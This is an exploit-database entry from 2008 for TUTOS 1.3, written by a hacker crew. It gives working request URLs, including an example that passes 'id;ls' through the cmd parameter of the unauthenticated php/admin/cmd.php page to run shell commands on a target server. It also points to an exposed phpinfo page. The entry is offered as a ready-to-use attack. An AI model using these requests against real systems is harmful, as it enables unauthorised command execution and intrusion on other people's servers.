TUTOS 1.3 - 'cmd.php' Remote Command Execution

Author: Houssamix
type: webapps
platform: php
port: 
date_added: 2008-01-06 
date_updated: 2016-10-25 
verified: 1 
codes: OSVDB-42744;CVE-2008-0149;OSVDB-42743;CVE-2008-0148 
tags: 
aliases:  
screenshot_url:  
application_url: 

######################################################################################
# AUTHOR : H-T TeaM {HouSSaMix _ ToXiC350}                                           #
# HOME : http://no-hack.net           						     #
# Script :  TUTOS (Tested in version 1.3) other versions may also be affected.       #
# Download : http://www.tutos.org/homepage/index.html                                #
# BUG :      Command Execution Vulnerability                                         #
######################################################################################

(~)| 3xpl0it4t10n

 -1- : Command Execution

    http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php?cmd=[your command]

   >> we dont need a permission admin for access to '/php/admin/cmd.php' :d

    exemple :  http://site.com/tutos/php/admin/cmd.php?cmd=id;ls

	or we can just  enter into : http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php
	and right the command in [ CMD(*) ] and press enter :d

-2- Get phpinfo

   http://[TARGEt]/[path_TUTOS]/php/admin/phpinfo.php

(~)| Explantion By Video :
     http://no-hack.net/video/tutos.zip


# greezt : CoNaN  , GoLd_M , RoMaNcYxHaCkEr , and all muslims Hackers

######################################################################################
#                  H-T TeaM {HouSSaMix _ ToXiC350}                                   #
######################################################################################

# milw0rm.com [2008-01-07]